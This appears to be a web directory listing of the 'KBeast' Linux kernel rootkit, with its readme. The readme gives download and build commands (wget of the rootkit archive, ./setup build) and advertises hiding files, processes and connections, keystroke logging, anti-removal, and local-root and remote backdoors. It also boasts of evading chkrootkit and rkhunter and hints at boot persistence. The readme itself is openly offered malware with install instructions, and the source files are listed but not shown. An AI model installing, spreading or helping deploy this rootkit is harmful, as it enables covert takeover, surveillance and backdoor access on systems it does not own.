Index of /rootkit/kernel-rootkit/kbeast-v1/
Name | Last Modified | Size |
---|---|---|
Parent Directory | ||
init | 2011-12-31 17:32 | - |
bd-ipsecs-kbeast-v1.c | 2011-12-28 18:30 | 3k |
config.h | 2011-12-27 19:57 | 1k |
ipsecs-kbeast-v1.c | 2012-01-01 16:37 | 20k |
ipsecs-kbeast-v1.cc1 | 2011-12-27 19:57 | 20k |
LICENSE | 2012-01-01 16:37 | 1k |
Makefile | 2011-12-27 04:38 | 1k |
setup | 2011-12-28 18:30 | 6k |
KBeast (Kernel Beast) is new kernel rootkit based on the publicly known rootkit,
modification is made in order to support kernel 2.6.16, 2.6.18, 2.6.32, and 2.6.35.
Actually it should work for kernel 2.6.18 up to 3.x.x or more, but our installer
script is only created for 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Below are quick
step installing the beast:
> wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
> tar zxvf ipsecs-kbeast-v1.tar.gz
> cd kbeast-v1/
> modify config.h to meet your requirement, remember that _MAGIC_NAME_
must be user with sh/bash shell
> In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
> In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build
(actually it should work for the recent kernel)
> In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat()
related code, modify syscall table address manually, then execute ./setup build 0
Be kind to note that the beast has been tested in, but not limited to, kernel 2.6.9,
2.6.16, 2.6.18, 2.6.32, 2.6.35 (i386 or x86_64). The feature of this rootkit are:
> Hiding this loadable kernel module
> Hiding files/directory
> Hiding process (ps, pstree, top, lsof)
> Hiding socket and connections (netstat, lsof)
> Keystroke logging to capture user activity
> Anti-kill process
> Anti-remove files
> Anti-delete this loadable kernel modules
> Local root escalation backdoor
> Remote binding backdoor hidden by the kernel rootkit
During my test with chkrootkit and rkhunter, this rootkit wasn’t detected by
those rootkit hunter. The limitation of my rootkit, you have to think yourself how to
load the rootkit when the server rebooted. Believe me that is easy task, please see
modification of init script here as example. Finally, you can download the kernel
beast on core.ipsecs.com.
See Nightmare for Linux System Administrator, and Happy New Year 2012!
Proudly Served by LiteSpeed Web Server at core.ipsecs.com Port 80